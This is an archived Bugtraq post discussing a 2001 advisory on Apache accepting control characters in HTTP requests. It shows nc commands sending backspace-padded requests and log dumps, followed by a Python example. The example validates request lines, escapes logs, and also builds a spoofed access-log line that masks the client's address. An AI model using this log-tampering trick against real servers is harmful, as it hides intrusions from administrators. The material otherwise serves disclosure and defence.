Bugtraq mailing list archives

Re: Securax Advisory 12


From: Alex Muntada <alexm () AC UPC ES>
Date: Wed, 3 Jan 2001 12:22:03 +0100

incubus wrote:

When the backspace character is sent after a NULL-terminated
request, we will get an answer, the page we requested, but our
entry in the access_log file is kinda altered. We can overwrite
our IP address when someone wants to cat the logfile to the
screen or maybe also to a device (such as: > /dev/lp0),

NUL-terminated request aside, the logging of backspace (and any
other control characters) in httpd logs was discussed some time
ago, as you can see below; for details, see the Bugtraq archives:

  http://www.securityfocus.com/archive/1/11840

mnemonix wrote:

The problem relates to "allowable" REQUEST_METHODs when a dynamic
resource, such as a CGI script, is requested. Essentially _any_
REQUEST_METHOD (except for HEAD, TRACE and OPTIONS) can be used,
even methods not defined in the HTTP protocol. Consider the
following requests, which all return the requested resource.

 GET /cgi-bin/environ.cgi HTTP/0.9

 Azx5T8uHTRuDL /cgi-bin/environ.cgi HTTP/1.0

Even control characters are allowed. Consider the following:

 ^H^H^H^H^H^H^H^H^H lots of these ^H^H /cgi-bin/environ.cgi HTTP/1.1

Sevo Stille wrote:

Of course control chars are and must be allowed: CGI is defined
to be transparent towards the application. For a request not
satisfied by the server, the server would have to (and at any
rate Apache does) return a 501 Method Not Implemented error,
according to the specs, par. 5.1.1.1.

Henrik Nordstrom wrote:

Not really. RFC 2068 defines method as a token, which is "1*<any
CHAR except CTLs or tspecials>" so the above may be rejected with a
"400 Bad Request" reply as it is not valid HTTP syntax.

HTTP puts restrictions on which characters are allowable in
all parts of the protocol except the message body.

The same applies to the entire Request-Line and Simple-Request (as
depicted in the Securax advisory).

I tested Apache 1.3.14 (source-compiled httpd) and it still accepts
control chars in HTTP requests, but it shouldn't, as pointed out by
Henrik Nordstrom.

Just a last comment on kosheen.c: in my tests against Apache, it
seems to discard anything after a NUL byte, so kosheen doesn't work
as expected unless the NUL is removed:

  % cat <<EOF | nc www.example.com 80
  GET /index.html HTTP/1.0^@^H^H^H^H

  EOF

  ....HTML....

  % tail -1 access_log | od -c
  0000000   w   w   w   .   e   x   a   m   p   l   e   .   c   o   m
  0000020   -       -       [   0   3   /   J   a   n   /   2   0   0   1
  0000040   :   1   1   :   4   5   :   1   4       +   0   1   0   0   ]
  0000060       "   G   E   T       /   i   n   d   e   x   .   h   t   m
  0000100   l       H   T   T   P   /   1   .   0   "       2   0   0
  0000120   4   8   5   9       -       -  \n
  % cat <<EOF | nc www.example.com 80
  GET /index.html HTTP/1.0^H^H^H^H

  EOF

  ....HTML....

  % tail -1 access_log | od -c
  0000000   w   w   w   .   e   x   a   m   p   l   e   .   c   o   m
  0000020   -       -       [   0   3   /   J   a   n   /   2   0   0   1
  0000040   :   1   1   :   4   5   :   1   4       +   0   1   0   0   ]
  0000060       "   G   E   T       /   i   n   d   e   x   .   h   t   m
  0000100   l       H   T   T   P   /   1   .   0  \b  \b  \b  \b   "
  0000120   2   0   0       4   8   5   9       -       -  \n


Best,
Alex

--
Alex Muntada <alexm () ac upc es>
http://www.ac.upc.es/homes/alexm/
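The two technical points argued in this thread, Henrik Nordstrom's RFC 2068 token rule for the Request-Line and the backspace trick visible in the od -c dumps, as an added Python example. This is not code from the post, from Apache, or from kosheen.c. The strict request-line check returns 400 for any control octet and 501 for a well-formed but unimplemented method; the log helpers scan a Common Log Format line for control octets, escape them for safe display, and simulate how a terminal that honours backspace would render the line, including a padded request that "retypes" the whole entry under a different client name. The log lines, the fake client name 10.9.8.7 and the set of implemented methods are constructed assumptions for the example.

```python
import re

# RFC 2068 section 2.2, transcribed from the spec (the grammar Henrik cites):
#   CTL       = octets 0-31 and 127
#   tspecials = ( ) < > @ , ; : \ " / [ ] ? = { } SP HT
#   token     = 1*<any CHAR except CTLs or tspecials>
CTLS = set(range(0, 32)) | {127}
TSPECIALS = set(b'()<>@,;:\\"/[]?={} \t')
HTTP_VERSION = re.compile(rb'^HTTP/\d+\.\d+$')
# Methods this hypothetical origin server implements (assumption for the example).
IMPLEMENTED = {b'GET', b'HEAD', b'POST'}


def is_token(b):
    """True if b is a non-empty RFC 2068 token (7-bit, no CTL, no tspecial)."""
    return len(b) >= 1 and all(c < 128 and c not in CTLS and c not in TSPECIALS for c in b)


def check_request_line(raw):
    """Classify one Request-Line as a strict RFC 2068 parser would.

    Returns (status, reason): 0 = acceptable and implemented, 400 = bad syntax
    (any CTL in the line counts, which is Henrik's point), 501 = a valid token
    that the server does not implement. Simple-Request ('GET SP URI') is allowed.
    """
    line = raw.rstrip(b'\r\n')
    bad = [c for c in line if c in CTLS]
    if bad:
        return 400, 'control octet(s) in Request-Line: %s' % [hex(c) for c in bad]
    parts = line.split(b' ')
    if len(parts) == 2 and parts[0] == b'GET':
        method, uri, version = parts[0], parts[1], None   # HTTP/0.9 Simple-Request
    elif len(parts) == 3:
        method, uri, version = parts
    else:
        return 400, 'expected Method SP Request-URI SP HTTP-Version'
    if not is_token(method):
        return 400, 'Method is not a token'
    if not uri:
        return 400, 'empty Request-URI'
    if version is not None and not HTTP_VERSION.match(version):
        return 400, 'malformed HTTP-Version'
    if method not in IMPLEMENTED:
        return 501, 'method %r is a token but not implemented' % method
    return 0, 'ok'


# Constructed Common Log Format pieces matching the od -c dump in the post.
PREFIX = b'www.example.com - - [03/Jan/2001:11:45:14 +0100] "'
REQ = b'GET /index.html HTTP/1.0'
SUFFIX = b'" 200 4859 - -\n'
SAMPLE_LOG = PREFIX + REQ + b'\x08\x08\x08\x08' + SUFFIX   # the second run above


def spoofed_log_line(fake_client=b'10.9.8.7'):
    """Log line a server that logs the request field verbatim would write if the
    client pads the request with enough backspaces to walk back over the whole
    prefix and then 'retypes' it with a different client name (constructed)."""
    fake_prefix = fake_client + PREFIX[len(b'www.example.com'):]
    tail = b'\x08' * (len(PREFIX) + len(REQ)) + fake_prefix + REQ
    return PREFIX + REQ + tail + SUFFIX


def control_chars_in(log_line):
    """(offset, value) of every control octet in the line, trailing LF excluded."""
    return [(i, c) for i, c in enumerate(log_line.rstrip(b'\n')) if c in CTLS]


def escape_for_display(log_line):
    """Render the line with control octets as \\xHH, so cat/less/lp cannot be
    steered by them (the defensive counterpart of the od -c check in the post)."""
    return ''.join(chr(c) if c < 128 and c not in CTLS else '\\x%02x' % c
                   for c in log_line.rstrip(b'\n'))


def render_on_dumb_terminal(log_line):
    """Simulate a terminal that honours BS (cursor left) and CR (column 0):
    later bytes overwrite earlier ones, which is what makes the ^H trick work."""
    screen, col = [], 0
    for c in log_line.rstrip(b'\n'):
        if c == 0x08:
            col = max(col - 1, 0)
        elif c == 0x0d:
            col = 0
        elif c in CTLS:
            continue               # other control octets: no glyph, no cursor move
        else:
            if col < len(screen):
                screen[col] = chr(c)
            else:
                screen.append(chr(c))
            col += 1
    return ''.join(screen)


if __name__ == '__main__':
    for req in (b'GET /cgi-bin/environ.cgi HTTP/0.9',
                b'Azx5T8uHTRuDL /cgi-bin/environ.cgi HTTP/1.0',
                b'\x08\x08\x08 /cgi-bin/environ.cgi HTTP/1.1',
                REQ + b'\x00\x08\x08\x08\x08'):
        print(req, '->', check_request_line(req + b'\r\n'))
    print(control_chars_in(SAMPLE_LOG))
    print(escape_for_display(SAMPLE_LOG))
    print(render_on_dumb_terminal(SAMPLE_LOG))
    print(render_on_dumb_terminal(spoofed_log_line()))
```

The strict check rejects every request in the thread that carries a control character (including the NUL-then-backspace one) with 400 before any logging happens, and classifies mnemonix's made-up method as 501 rather than executing the CGI. On the log side, render_on_dumb_terminal shows why the four backspaces turn "HTTP/1.0" into "HTTP" on screen, and why a longer run of backspaces lets the request field repaint the whole line under a fake client; escape_for_display is the safe way to look at such a file.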
